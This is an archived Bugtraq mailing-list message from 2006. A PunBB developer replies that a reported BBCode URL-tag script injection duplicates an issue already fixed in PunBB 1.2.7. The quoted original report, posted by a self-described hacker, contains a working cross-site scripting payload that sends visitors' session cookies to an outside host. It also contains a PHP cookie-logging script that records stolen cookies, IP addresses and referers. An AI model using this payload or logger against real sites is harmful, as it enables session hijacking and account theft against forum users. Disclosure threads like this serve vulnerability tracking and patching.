[42300] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: PunBB BBCode URL Tag Script Injection Vulnerability

daemon@ATHENA.MIT.EDU (Rickard Andersson)
Wed Jan 18 15:50:22 2006

Message-ID: <43CD405F.2050706@punbb.org>
Date: Tue, 17 Jan 2006 20:07:11 +0100
From: Rickard Andersson <security@punbb.org>
MIME-Version: 1.0
To: night_warrior771@hotmail.com
Cc: bugtraq@securityfocus.com
In-Reply-To: <20060116113448.1218.qmail@securityfocus.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

This is a duplicate of http://www.securityfocus.com/bid/14808/info which 
was dealt with in PunBB 1.2.7 (released september 2, 2005). It only 
affected Internet Explorer users by the way. Why re-post it?

Rickard Andersson
PunBB dev


night_warrior771@hotmail.com wrote:
> ##Night_Warrior<Kurdish Hacker>
> ##night_warrior771[at]hotmail.com
> ##PunBB BBCode URL Tag Script Injection Vulnerability
> ##Contact :night_warrior771[at]hotmail.com
> 
> Vulnerable:
> 
> [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://nigwar.tollfreepage.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
> 
> <?php
> cookies.php
> $cookie = $_GET['c'];
> $ip = getenv ('REMOTE_ADDR');
> $date=date("j F, Y, g:i a");
> $referer=getenv ('HTTP_REFERER');
> $fp = fopen('steal.php', 'a');
> fwrite($fp, '
> Cookie: '.$cookie.'
> IP: ' .$ip. '
> Date and Time: ' .$date. '
> Referer: '.$referer.' ');
> fclose($fp);
> ?>
> 
> Contact :night_warrior771[at]hotmail.com
> Night_Warrior
>


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[42300] in bugtraq

Re: PunBB BBCode URL Tag Script Injection Vulnerability

daemon@ATHENA.MIT.EDU (Rickard Andersson)Wed Jan 18 15:50:22 2006

daemon@ATHENA.MIT.EDU (Rickard Andersson)
Wed Jan 18 15:50:22 2006